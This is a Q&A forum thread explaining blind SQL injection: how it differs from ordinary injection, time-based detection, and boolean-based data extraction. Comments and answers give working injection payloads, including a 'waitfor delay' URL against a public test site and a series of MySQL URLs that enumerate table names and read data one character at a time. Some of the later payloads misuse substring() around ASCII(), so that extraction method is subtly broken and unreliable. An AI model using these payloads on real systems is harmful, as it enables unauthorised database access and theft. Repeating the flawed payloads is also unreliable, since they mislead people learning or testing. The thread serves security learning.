# What is blind injection and how to simulate the issue?

Tags: sql-injection

What is blind SQL injection, and how does it differ from normal SQL injection? How can I simulate an issue of blind injection?

Answer (score 1):

As the name implies, the technique injects SQL, but while being "blind": In response to the request, you won't receive an error message that displays the presence of the SQL injection vulnerability, such as:

> Unclosed quotation mark after the character string ' '.

The fact that you can't deduct the presence of the vulnerability doesn't mean it's not there.

A common method to test for this is to let the server impose a delay in responding: If the server responds immediately, it is not vulnerable. If it takes more time (say, 10 seconds), it is vulnerable.

OWASP has a great [page](https://www.owasp.org/index.php/Blind_SQL_Injection) on it, and (much) more information is available on [SlideShare](http://www.slideshare.net/joemccray/AdvancedSQLInjectionv2)  and on the [InterN0T forum](http://forum.intern0t.org/web-hacking-war-games/818-blind-sql-injection.html).

Comment: How to simulate this issue any specific example?

Comment: Acunetix's vulnerable web app is a good test bed.  http://testasp.vulnweb.com/showthread.asp?id=1;%20waitfor%20delay%20%270:0:5%27 - This page gives you a 5 second delay, showing it is actually executing SQL commands.

Answer (score 0):

An SQL injection is called blind if the result of the injection are not visible to the attacker, but, for example, is only used internally. Instead, the attacker can only notice that the application behaves differently on different injection samples.

One technique to exploit a blind SQL injection is using [Boolean algebra](http://en.wikipedia.org/wiki/Boolean_algebra) where the attacker tries to inject additional conditions, which are either always true (tautology) or always false (contradiction).

One example of a ‘*boolean-based blind SQL injection*’ is injecting a condition that is always true:

```
… OR 1=1 OR …
```

If this would be injected into the `WHERE` clause, it would be true for each row and thus return a different result set than when injecting the following, which is always false and thus does return an empty result set:

```
… AND 1=2 AND …
```

---

Here’s an example: Imagine the following two SQL statements. The first one is injectable but its result is not visible to the user but only used in the second statement:

```
SELECT vendor_id FROM products WHERE id = $product_id LIMIT 1
SELECT name FROM vendors WHERE id = $vendor_id LIMIT 1
```

With `product_id=123 AND 1=1` the application may return *Acme* and with `product_id=123 AND 1=2` the application may return with an error stating that the product/vendor cannot be found. From this behavior the attacker can reason that if the injected condition is true *Acme* is returned while for a false condition an error is returned.

Now if he would replace the `1=1`/`1=2` with a boolean test like `users.name = 'admin' AND users.password LIKE 'secre%'` he is able to read arbitrary data from the database character by character: If *Acme* is returned, the admin’s password begins with `secre`, otherwise it doesn’t.

Answer (score 0):

In blind SQL injection results don't appear on the webpage directly, rather you get the web page response. If it loads fine, that means all content appearing on web page or it is missing some content.

Manually injecting blind is time consuming but it is still interesting, you only need to be good in SQL.

For example:

```
site.com/gallery.php?id=1 and 1=1-- - will load fine
site.com/gallery.php?id=1 and (select 1)=1--  - will also load fine
```

MySQL versions=>5 have information_schema.tables you can go for:

```
site.com/gallery.php?id=1 and substring((select concat(1,table_name) from information_schema.tables where table_schema=database()),1,1)=1-- -
```

The above will also load fine because we are only taking first character by using substring function and comparing it with 1.

substring() function returns to you a part of the string depending upon the parameter you specified.

If it loads fine, then go for:

```
site.com/gallery.php?id=1 and substring(ASCII((select table_name from information_schema.tables where table_schema=database() limit 0,1)),1,1)>1-- -
```

Now you need an ascii table to check (you can Google it):

```
site.com/gallery.php?id=1 and substring(ASCII((select table_name from information_schema.tables where table_schema=database() limit 0,1)),1,1)>96-- -
```

If the above loads, it means it could be 'a' to 'z'. Then you see if it responds at 98 but not at 99, if so, then 99 is the first character in the alphabet, which is 'c'.

Now for the next character you need to change the substring function to:

```
site.com/gallery.php?id=1 and substring(ASCII((select table_name from information_schema.tables where table_schema=database() limit 0,1)),2,1)>96-- -
```

This is the main logic which is used in most penetration testing tools. I have confirmed it manually using MySQL and MSSQL.

Another thing to add here is that tools select a keyword when checking with `and 1=1` and after that, it verifies if that keyword is appearing on page or not and make decisions.